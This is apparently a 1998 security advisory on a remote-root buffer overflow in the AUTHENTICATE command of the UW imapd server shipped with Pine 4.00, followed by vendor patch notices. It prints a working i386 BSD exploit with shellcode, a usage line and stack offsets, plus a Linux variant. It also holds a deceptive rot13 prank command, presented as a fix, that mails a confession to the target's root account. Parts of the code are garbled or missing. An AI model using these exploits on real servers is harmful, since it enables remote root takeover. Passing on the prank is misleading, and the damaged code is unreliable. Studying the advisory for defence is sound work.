

    UW IMAP server prior to the final (frozen, non-beta) imap-4.1
    UW IMAP4rev1 servers prior to v10.234.
    v10.234 server distributed with Pine 4.0


    Those  who  have  installed  Pine  4.00  should know be aware of a
    security problem  with the  imapd server  that is  included in the
    Pine 4.00 distribution.

    This recent hole is similar in nature to the older hole  described
    in  CERT  Advisory  CA-97.09  and  the Secure Networks advisory of
    March 2, 1997 upon which the  CERT advisory is based, but this  is
    an all new  hole and is  *not* covered by  the fixes presented  in
    these advisories.  The previous IMAP server hole involved a  stack
    buffer  overflow  condition  in  the  processing of the IMAP LOGIN
    command  in  which  arbitrary  machine  code  can  be  executed by
    carefully  crafting  an  overly  long  user  name.   This time the
    affected command  is the  IMAP AUTHENTICATE  command, which  takes
    one  argument  specifying  the  authentication  mechanism.  When a
    carefully  crafted  mechanism  name  that  exceeds  the  size of a
    special stack buffer  is presented to  the IMAP server,  the saved
    instruction pointer  on the  stack is  overwritten with  a altered
    value that can result in the execution of arbitrary machine  code,
    due to coding errors in the IMAP server.   Following text is Cheez
    Whiz credit.

    The following source code  discussion pertains to imapd  10.234 as
    distributed  with  Pine  4.00.   The  problem  code appears in the
    mail_auth()  routine  in  mail.c  of  the  IMAP server source code
    distribution, which reads:

    char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[])
      char tmp[MAILTMPLEN];
      AUTHENTICATOR *auth;
				    /* make upper case copy of mechanism name */
      ucase (strcpy (tmp,mechanism));
      for (auth = mailauthenticators; auth; auth = auth->next)
	if (auth->server && !strcmp (auth->name,tmp))
	  return (*auth->server) (resp,argc,argv);
      return NIL;                   /* no authenticator found */

    The problem lies in the strcpy() call that copies the contents  of
    mechanism  to  tmp  which  resides  on  the  stack as an automatic
    variable.   The  tmp  buffer  is  MAILTMPLEN  bytes  in size, with
    MAILTMPLEN defined  to be  1024 in  mail.h.   However, the command
    string read from the client by the server is placed into a  buffer
    TMPLEN bytes in size, with  TMPLEN defined to be 8192  in imapd.c,
    thus allowing the passing of arguments to mail_auth() that greatly
    exceed the size  of its temporary  buffer.  Since  the IMAP server
    has not  yet given  up its  root privileges  at this  stage of the
    login  process,  this  programming  oversight  can be exploited to
    yield  root  compromise  on  the  IMAP  server  machine.  Crafting
    machine code to take over the IMAP server through the AUTHENTICATE
    command buffer overflow presents technical challenges because  the
    buffer contents  are passed  through ucase()  which transforms all
    lowercase characters  to uppercase,  so the  exploit machine code,
    which typically spawns a shell, must be impervious to mangling  by
    toupper().  The "standard" i386 BSD exploit code, however,  proves
    to  be  exceptionally  resilient  and  actually the only necessary
    modification proves to be  protecting the lowercase characters  in
    the string  "/bin/sh" which  requires only  trivial modifications.
    Recent versions of imapd also include checks in parse_astring() in
    imapd.c to reject characters with  the high bit (eighth bit)  set,
    so malicious exploit code (which often contains characters greater
    than 0x7f  and non-letter  characters) must  be smuggled  in as  a
    string literal argument to the AUTHENTICATE command, which  proves
    to be  only a  minor difficulty.   So, implications  are that  any
    remote individual with malicious  intentions may gain root  access
    to the  machine running  a vulnerable  version of  imapd, with  no
    knowledge of  any valid  local usernames  or passwords.   As such,
    this matter should be treated with the utmost of seriousness.

    Initial analysis seems to indicate  that versions of the UW  imapd
    IMAP 4.1 server up through  version 10.234 distributed as part  of
    the Pine  4.00 distribution  are vulnerable.   Versions as  old as
    10.191 have been  analyzed and found  to be vulnerable,  and it is
    believed that  earlier versions  are likely  vulnerable, as  well.
    It may be safe to assume  that all versions of imapd (previous  to
    and including the version distributed with Pine 4.00) that support
    the IMAP AUTHENTICATE command are vulnerable.

    The  following  code  exercises  the  buffer overflow condition on
    platforms running i386  versions of BSD  UNIX, such as  FreeBSD or
    BSDI.  If you're trying to use this code and it doesn't seem to be
    working, type the following command at your UNIX prompt:

	echo "v nz gelvat gb unpx ebbg" | tr a-z n-za-m | mail root@hostname

    where  "hostname"  should  be  replaced  with  the hostname of the
    machine running the IMAP server.  Make sure you type it exactly as
    listed, since every character counts.  Once you've done that,  try
    the exploit code  again and it  should work (below  this exloit is
    another one for Linux).

    ***  i386 BSD remote root exploit for UW imapd IMAP 4.1 server
    ***  This is *not* the same bug addressed in CERT Advisory CA-97.09!
    ***  Usage:  % (imappy nop esp offset; cat) | nc hostname 143
    ***  where nop is the number of NOP opcodes to place at the start of the
    ***  exploit buffer (I use 403), esp is the %esp stack pointer value, and
    ***  offset is the number of bytes to add to esp to calculate your target
    ***  %eip.
    ***  Demonstration values for UW imapd 10.234 (part of Pine 4.00):
    ***      imappy 403 0xefbfd5e8 100    (BSDI 3.0)
    ***      imappy 403 0xefbfd4b8 100    (FreeBSD 2.2.5)
    ***  Cheez Whiz
    ***  July 16, 1998

    #include <stdio.h>
    #include <stdlib.h>
    #include <limits.h>
    #include <string.h>

    #define BUFLEN (2*1024)
    #define NOP 0x90

    char shell[] =
    /*  0 */ "\xeb\x34"                      /* jmp springboard              */
    /* start:                                                                */
    /*  2 */ "\x5e"                          /* popl %esi                    */
    /*  3 */ "\x8d\x1e"                      /* leal (%esi),%ebx             */
    /*  5 */ "\x89\x5e\x0b"                  /* movl %ebx,0xb(%esi)          */
    /*  8 */ "\x31\xd2"                      /* xorl %edx,%edx               */
    /* 10 */ "\x89\x56\x07"                  /* movl %edx,0x7(%esi)          */
    /* 13 */ "\x89\x56\x0f"                  /* movl %edx,0xf(%esi)          */
    /* 16 */ "\x89\x56\x14"                  /* movl %edx,0x14(%esi)         */
    /* 19 */ "\x88\x56\x19"                  /* movb %dl,0x19(%esi)          */
    /* 22 */ "\x31\xc0"                      /* xorl %eax,%eax               */
    /* 24 */ "\xb0\x7f"                      /* movb $0x7f,%al               */
    /* 26 */ "\x20\x46\x01"                  /* andb %al,0x1(%esi)           */
    /* 29 */ "\x20\x46\x02"                  /* andb %al,0x2(%esi)           */
    /* 32 */ "\x20\x46\x03"                  /* andb %al,0x3(%esi)           */
    /* 35 */ "\x20\x46\x05"                  /* andb %al,0x5(%esi)           */
    /* 38 */ "\x20\x46\x06"                  /* andb %al,0x6(%esi)           */
    /* 41 */ "\xb0\x3b"                      /* movb $0x3b,%al               */
    /* 43 */ "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx          */
    /* 46 */ "\x89\xca"                      /* movl %ecx,%edx               */
    /* 48 */ "\x52"                          /* pushl %edx                   */
    /* 49 */ "\x51"                          /* pushl %ecx                   */
    /* 50 */ "\x53"                          /* pushl %ebx                   */
    /* 51 */ "\x50"                          /* pushl %eax                   */
    /* 52 */ "\xeb\x18"                      /* jmp exec                     */
    /* springboard:                                                          */
    /* 54 */ "\xe8\xc7\xff\xff\xff"          /* call start                   */
    /* data:                                                                 */
    /* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8"  /* DATA (disguised /bin/sh)     */
    /* 66 */ "\x01\x01\x01\x01"              /* DATA                         */
    /* 70 */ "\x02\x02\x02\x02"              /* DATA                         */
    /* 74 */ "\x03\x03\x03\x03"              /* DATA                         */
    /* exec:                                                                 */
    /* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0                */

    char buf[BUFLEN];
    unsigned long int nop, esp;
    long int offset;

    main (int argc, char *argv[])
	int i;

	if (argc < 4) {
	    printf("usage: %s nop esp offset\n", argv[0]);

	nop = strtoul(argv[1], NULL, 0);
	esp = strtoul(argv[2], NULL, 0);
	offset = strtol(argv[3], NULL, 0);

	memset(buf, NOP, BUFLEN);
	memcpy(buf+nop, shell, strlen(shell));
	for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
	    *((int *) &buf[i]) = esp + offset;

	printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
	for (i = 0; i < BUFLEN; i++)


    Linux exploit:

       UW Imap remote exploit for x86Linux by Juan A. Fernández Jiménez
       Systems affect: Ummm...I only tested it in IMAP4rev1v10.203
       Greetz to: Koji, Sud, Darkmoon, Marneus, NBH Group ...
       How to use: # (./imaplinux;cat) | nc target_host 143
       This exploit is based in the remote exploit created by Cheez Whiz.
       You feel free to change the nops,offsets and esp...the shellcode is
       all original from me... :P problems with toupper()
		    ESP=0xBFFFF04C for v10.203
       22/07/98 23:26

    #define BUF 2048
    #define NOP 0x90

    char shellcode[]=

    char buffer[BUF];
    long int nop=422,esp=0xBFFFF04C,offset=100;

    void main() {
    int cont;


    for(cont=nop+strlen(shellcode);cont < BUF-4;cont+=4) *((int *)

    printf("* AUTHENTICATE {%d}\r\n",BUF);
    for(cont=0;cont<sizeof(buffer);cont++) putchar(buffer[cont]);


    This will be  fixed in the  Pine 4.01 maintenance  release, but in
    the mean time, if you are using the UW IMAP server, please  update
    it with the following distribution:

    IMAP Server Vendors Info:
    NEC Corporation
	The University of Washington imapd is shipped with our product
	"Mobilenet/IMAP" and so it is vulnerable.

	Netscape Messaging Server 3.55  and before are susceptible  to
	this vulnerability. However, it should be noted that  Netscape
	Messaging  Server  (any  version)  does  NOT  run  as root and
	therefore,  the  exposure  is  much  more  limited  than   the
	University  of  Washington   example.   Regardless,  we   have
	released a patch available at:

	which addresses this vulnerability.

    Sun Microsystems
	Sun Microsystems is working  on patches for Solstice  Internet
	Mail Server product versions 2.0, 3.1 and 3.2.

    Caldera Linux
	Releasing patched imap-4.1; will release imap-4.2 as soon as
	it becomes available at:

	FreeBSD does not ship default  with imap. However, there is  a
	version of  imapd from  Washington University  in the  FreeBSD
	ports collections, known as imap-uw.   If anyone is using  the
	imap port, we suggest fetching the latest revision of imap and
	manually install it, or wait until the FreeBSD port is updated
	and reinstall imap-uw using the ports system.  You can check
	the ports status at:

    IBM Corporation
	The  version  of  imapd  shipped  with  AIX  4.2  and  4.3  is
	vulnerable.  We are  currently working on the  following fixes
	which will be available soon:

	AIX 4.2.x:  IX80446
	AIX 4.3.x:  IX80447


	rpm -Uvh
	rpm -Uvh
	rpm -Uvh

	rpm -Uvh
	rpm -Uvh
	rpm -Uvh

    The Santa Cruz Operation, Inc.
	The SCO UnixWare 7 product is vulnerable.  Binary versions  of
	University of Washington imapd will be available shortly  from
	the SCO ftp site: - cover letter - replacement binaries

    Silicon Graphics Inc.
        Silicon  Graphics   distributes  a   freeware  University   of
        Washington imapd daemon called fw_imap which is available from
        the web via

    Sun Microsystems Inc.
        Sun  recommends  that  you  install  the  patches listed below
        immediately on  systems using  Sun Internet  Mail Server(SIMS)
        3.2 and 2.0.  The following patches are available in  relation
        to the above problem:

        SIMS                Patch ID
        _____               _________
        3.2                 105935-09
        3.2_x86             105936-09
        2.0                 105346-07
        2.0_x86             105347-07

    Note: Sun recommends that sites using SIMS 3.1 or 3.1_x86  upgrade
    to 3.2 or 3.2_x86  and apply the corresponding  patches referenced